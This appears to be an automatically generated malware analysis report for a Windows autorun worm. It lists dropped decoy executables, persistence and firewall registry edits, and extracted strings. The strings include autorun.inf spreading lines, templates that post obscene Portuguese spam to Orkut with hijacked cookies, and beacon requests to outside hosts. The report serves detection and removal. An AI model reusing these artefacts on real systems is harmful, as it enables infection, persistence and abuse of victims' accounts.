Dropped.Generic.Malware.SFY.A8CEC62E_bead10d41a
Dropped:Generic.Malware.SFY.A8CEC62E (BitDefender), Worm:Win32/Autorun.ACL (Microsoft), not-a-virus:AdWare.Win32.RivalGame.kr (Kaspersky), Worm.Win32.AutoRun (VIPRE), Win32.HLLW.Autoruner1.15431 (DrWeb), Dropped:Generic.Malware.SFY.A8CEC62E (B) (Emsisoft), W32/Autorun.worm.aj (McAfee), W32.SillyFDC (Symantec), Virus.DestroyPC (Ikarus), Dropped:Generic.Malware.SFY.A8CEC62E (FSecure), Downloader.Banload.BQXZ (AVG), Win32:Agent-AMWP [Trj] (Avast), Mal_OtorunO (TrendMicro), Dropped:Generic.Malware.SFY.A8CEC62E (AdAware), Trojan.Win32.Swrort.4.FD, TrojanSwrort.YR, GenericAutorunWorm.YR (Lavasoft MAS)
Behaviour: Trojan, Worm, Virus, Adware, WormAutorun, Malware
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
| Requires JavaScript enabled! |
|---|
MD5: bead10d41a7ea02fefb92eaa181c8822
SHA1: 64274d6003d9909b824487956a2e87cdea1ab261
SHA256: f8c6d353de75f8d80df76a86b4fe343677bf2777bc76d3e0c9c9853e99154532
SSDeep: 1536:JynMXC8ALeVRKkq6HnMohsxB9RPd5wYGQEP:7XC8ASOz6n9hsvPyQEP
Size: 71655 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: MingWin32GCC3x, UPolyXv05_v6
Company: System Applet
Created at: 2010-11-27 04:03:18
Analyzed on: WindowsXP SP3 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
| Behaviour | Description |
|---|---|
| WormAutorun | A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Dropped's file once a user opens a drive's folder in Windows Explorer. |
Process activity
The Dropped creates the following process(es):
%original file name%.exe:640
The Dropped injects its code into the following process(es):
dovq~.exe:1588
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process dovq~.exe:1588 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):
%Documents and Settings%\All Users\Start Menu\Programs\WinPcap .exe (601 bytes)
%Program Files%\NetMeeting .exe (601 bytes)
%Program Files%\Microsoft Office .exe (601 bytes)
%Program Files%\Online Services .exe (601 bytes)
%WinDir%\Media .exe (601 bytes)
%Program Files%\xerox .exe (601 bytes)
%WinDir%\Connection Wizard .exe (601 bytes)
%Documents and Settings%\%current user%\My Documents\My Music .exe (601 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Wireshark .exe (601 bytes)
%Program Files%\Internet Explorer .exe (601 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\VMware .exe (601 bytes)
%WinDir%\Offline Web Pages .exe (601 bytes)
%WinDir%\Cursors .exe (601 bytes)
%Program Files%\WinPcap .exe (601 bytes)
%WinDir%\AppPatch .exe (601 bytes)
%WinDir%\Resources .exe (601 bytes)
%WinDir%\ehome .exe (601 bytes)
%Program Files%\MSECache .exe (601 bytes)
%WinDir%\inf .exe (601 bytes)
%WinDir%\addins .exe (601 bytes)
%WinDir%\repair .exe (601 bytes)
%WinDir%\Driver Cache .exe (601 bytes)
%Program Files%\MSN .exe (601 bytes)
%WinDir%\Installer .exe (601 bytes)
%Program Files%\Common Files .exe (601 bytes)
%WinDir%\ime .exe (601 bytes)
%WinDir%\L2Schemas .exe (601 bytes)
%Documents and Settings%\%current user%\My Documents\My Pictures .exe (601 bytes)
%WinDir%\Provisioning .exe (601 bytes)
%Program Files%\Adobe .exe (601 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Administrative Tools .exe (601 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\ActivePerl 5.16.2 Build 1602 .exe (601 bytes)
%Program Files%\Uninstall Information .exe (601 bytes)
%Program Files%\MSN Gaming Zone .exe (601 bytes)
%WinDir%\Prefetch .exe (601 bytes)
%Program Files%\Outlook Express .exe (601 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Games .exe (601 bytes)
%WinDir%\java .exe (601 bytes)
%WinDir%\assembly .exe (601 bytes)
%Program Files%\ComPlus Applications .exe (601 bytes)
%WinDir%\LastGood .exe (601 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories .exe (601 bytes)
%WinDir%\Fonts .exe (601 bytes)
%WinDir%\PeerNet .exe (601 bytes)
%WinDir%\$hf_mig$ .exe (601 bytes)
%Program Files%\microsoft frontpage .exe (601 bytes)
%Program Files%\Microsoft.NET .exe (601 bytes)
%WinDir%\Debug .exe (601 bytes)
%WinDir%\Downloaded Program Files .exe (601 bytes)
%WinDir%\mui .exe (601 bytes)
%Program Files%\WindowsUpdate .exe (601 bytes)
%WinDir%\Registration .exe (601 bytes)
%Program Files%\Messenger .exe (601 bytes)
%WinDir%\Help .exe (601 bytes)
%WinDir%\msagent .exe (601 bytes)
%WinDir%\Config .exe (601 bytes)
%WinDir%\pchealth .exe (601 bytes)
%WinDir%\$NtUninstallKB898461$ .exe (601 bytes)
%Program Files%\Reference Assemblies .exe (601 bytes)
%Program Files%\Windows NT .exe (601 bytes)
%WinDir%\Microsoft.NET .exe (601 bytes)
%Program Files%\MSBuild .exe (601 bytes)
%WinDir%\Network Diagnostic .exe (601 bytes)
%WinDir%\msapps .exe (601 bytes)
%Program Files%\Movie Maker .exe (601 bytes)
%Program Files%\Windows Media Player .exe (601 bytes)
%WinDir%\$Reconfig$ .exe (601 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Startup .exe (601 bytes)
The process %original file name%.exe:640 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\dovq~.exe (601 bytes)
Registry activity
The process dovq~.exe:1588 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5A D3 D7 9C 29 E6 DF B6 44 2D BC 3A 99 26 0C 04"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"Hidden" = "2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"HideFileExt" = "1"
"ShowSuperHidden" = "0"
To automatically run itself each time Windows is booted, the Dropped adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"WinC" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\dovq~.exe"
Adds a rule to the firewall Windows which allows any network activity:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"dovq~.exe" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\dovq~.exe:*:Enabled:Windows Live 2010"
The process %original file name%.exe:640 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "60 44 DA 49 52 AB 01 B7 71 4A 1B 72 44 F0 BD 49"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"dovq~.exe" = "dovq~"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Dropped modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Dropped modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Dropped modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Dropped PE files
There are no dropped PE files.
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Dropped's file once a user opens a drive's folder in Windows Explorer.
VersionInfo
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 22180 | 22528 | 3.91852 | fbf080ca7a58851eef48ac44d4dda8f4 |
| .data | 28672 | 96 | 512 | 0.393627 | 9c105f6483065ccd0b51d9010300e6d0 |
| .rdata | 32768 | 3968 | 4096 | 3.79393 | d62ec91200a20acd2248bc901fc97f98 |
| .bss | 36864 | 2832 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| .idata | 40960 | 2520 | 2560 | 3.21175 | 94689627520518124594c928f4c9fcdc |
| .rsrc | 45056 | 90112 | 14848 | 2.7652 | eca87d8b1ffd0f1b8936371e56053693 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 2
575acdca6c86a3e75b50f978fd8e1c04
6c2f2b147f92fd26fe31ae43da408352
URLs
No activity has been detected.
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
Web Traffic was not found.
The Dropped connects to the servers at the folowing location(s):
.text
.data
.rdata
@.bss
.idata
.rsrc
7ev7.eXe
dovq~.exe
VVV.orkut.com.br
%c%c%c
À%c
POST_TOKEN=%s&signature=%s&Action.submit=1&scrapText=%s&uid=%s
POST /Scrapbook.aspx HTTP/1.0
Host: VVV.orkut.com.br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: %d
Cookie: %s %s orkut_state=%s
POST_TOKEN=%s&signature=%s&Action.join=Enviar dados
POST /CommunityJoin?cmm=%s HTTP/1.0
Action.editUserStatusMessage=1&POST_TOKEN=%s&signature=%s&userStatus=%s
POST /Home.aspx HTTP/1.0
evnene.xp3.biz
GET /MYC/sv.php?s=%s HTTP/1.0
Host: %s
usuarios.multimania.es
GET /v77/MYC/sv.php?s=%s HTTP/1.0
v%sdi%s
put%s
prostitut%s
raparig%s
%s p%s%sa
%s rol%s
%s penis
%s pa%s
%s pint%s
%s %sara%so
me d%s essa %s b%snda gord%s%s%s do %sara%s%s
filho da put%s%svo comer %s c%s
%s%s%svo comer %s c%s
v%s comer %s c%s%sar%sombad%s%sdo %sara%s%s
vai d%s a %s bunda %s%svem %s%spa %s
v%sm %sup%s %s %s do %sara%so
vem me f%sd%s gosto%so%sesfrega %s na minha %sr%s
%sou uma %s msm%s e adoro d%sr meu rabo%s%s %s %s v%sm me %s?%s
%su so uma %s e adoro d%sr minh%s buceta e o meu %s%s%s%s quer?%s
%sd%soro %s%spa %s bem grande e gr%ssso.%s%svem gozar na minha %s
%suer%s %s com %s gosto%so%svem m%s f%sder agora%seu %s com muito tesao
%su confesso que sinto um tes%so incontrol%svel %s%s%s importa o tamanho, cor, espessura%s%s %s importa %s %s o ma%so seja bem tarado, e me de muito prazer %s%sbviamente %s irei retribuir
GET /Scrapbook.aspx HTTP/1.0
Cookie: orkut_state=%s
JSHDF['CGI.POST_TOKEN'] =
JSHDF['Page.signature.raw'] =
GET /RequestFriends.aspx?req=fl&uid=%s HTTP/1.0
Cookie: orkut_state=%s; %s %s
107561828
108525857
108607764
%s .exe
%sautorun.inf
open=ESPFOLDER.exe
shell\open\Command="ESPFOLDER.exe -e"
shell\explore\Command="ESPFOLDER.exe -e"
%sESPFOLDER.exe
cmd.exe
reg.exe
taskkill.exe
regedit.exe
msconfig.exe
rstrui.exe
Unlocker.exe
taskmgr.exe
@live.com
@yahoo.com
@hotmail.com
@gmail.com
@msn.com
VAI TOMA NO C%cU
TUA MÊE AQUELA VADIA
VOU COMER SEU C%cU
%s_%s
GET /v77/MYC/CT/sv.php?s=%s HTTP/1.0
%s\%s
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
%s:*:Enabled:Windows Live 2010
ESPFOLDER.exe
Explorer.exe
%s:%u: failed assertion `%s'
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\dovq~.exe
RegCreateKeyA
ShellExecuteA
MapVirtualKeyA
keybd_event
ADVAPI32.DLL
KERNEL32.dll
msvcrt.dll
SHELL32.DLL
USER32.dll
WSOCK32.DLL
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:640
- Delete the original Dropped file.
- Delete or disinfect the following files created/modified by the Dropped:
%Documents and Settings%\All Users\Start Menu\Programs\WinPcap .exe (601 bytes)
%Program Files%\NetMeeting .exe (601 bytes)
%Program Files%\Microsoft Office .exe (601 bytes)
%Program Files%\Online Services .exe (601 bytes)
%WinDir%\Media .exe (601 bytes)
%Program Files%\xerox .exe (601 bytes)
%WinDir%\Connection Wizard .exe (601 bytes)
%Documents and Settings%\%current user%\My Documents\My Music .exe (601 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Wireshark .exe (601 bytes)
%Program Files%\Internet Explorer .exe (601 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\VMware .exe (601 bytes)
%WinDir%\Offline Web Pages .exe (601 bytes)
%WinDir%\Cursors .exe (601 bytes)
%Program Files%\WinPcap .exe (601 bytes)
%WinDir%\AppPatch .exe (601 bytes)
%WinDir%\Resources .exe (601 bytes)
%WinDir%\ehome .exe (601 bytes)
%Program Files%\MSECache .exe (601 bytes)
%WinDir%\inf .exe (601 bytes)
%WinDir%\addins .exe (601 bytes)
%WinDir%\repair .exe (601 bytes)
%WinDir%\Driver Cache .exe (601 bytes)
%Program Files%\MSN .exe (601 bytes)
%WinDir%\Installer .exe (601 bytes)
%Program Files%\Common Files .exe (601 bytes)
%WinDir%\ime .exe (601 bytes)
%WinDir%\L2Schemas .exe (601 bytes)
%Documents and Settings%\%current user%\My Documents\My Pictures .exe (601 bytes)
%WinDir%\Provisioning .exe (601 bytes)
%Program Files%\Adobe .exe (601 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Administrative Tools .exe (601 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\ActivePerl 5.16.2 Build 1602 .exe (601 bytes)
%Program Files%\Uninstall Information .exe (601 bytes)
%Program Files%\MSN Gaming Zone .exe (601 bytes)
%WinDir%\Prefetch .exe (601 bytes)
%Program Files%\Outlook Express .exe (601 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Games .exe (601 bytes)
%WinDir%\java .exe (601 bytes)
%WinDir%\assembly .exe (601 bytes)
%Program Files%\ComPlus Applications .exe (601 bytes)
%WinDir%\LastGood .exe (601 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories .exe (601 bytes)
%WinDir%\Fonts .exe (601 bytes)
%WinDir%\PeerNet .exe (601 bytes)
%WinDir%\$hf_mig$ .exe (601 bytes)
%Program Files%\microsoft frontpage .exe (601 bytes)
%Program Files%\Microsoft.NET .exe (601 bytes)
%WinDir%\Debug .exe (601 bytes)
%WinDir%\Downloaded Program Files .exe (601 bytes)
%WinDir%\mui .exe (601 bytes)
%Program Files%\WindowsUpdate .exe (601 bytes)
%WinDir%\Registration .exe (601 bytes)
%Program Files%\Messenger .exe (601 bytes)
%WinDir%\Help .exe (601 bytes)
%WinDir%\msagent .exe (601 bytes)
%WinDir%\Config .exe (601 bytes)
%WinDir%\pchealth .exe (601 bytes)
%WinDir%\$NtUninstallKB898461$ .exe (601 bytes)
%Program Files%\Reference Assemblies .exe (601 bytes)
%Program Files%\Windows NT .exe (601 bytes)
%WinDir%\Microsoft.NET .exe (601 bytes)
%Program Files%\MSBuild .exe (601 bytes)
%WinDir%\Network Diagnostic .exe (601 bytes)
%WinDir%\msapps .exe (601 bytes)
%Program Files%\Movie Maker .exe (601 bytes)
%Program Files%\Windows Media Player .exe (601 bytes)
%WinDir%\$Reconfig$ .exe (601 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Startup .exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\dovq~.exe (601 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"WinC" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\dovq~.exe" - Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
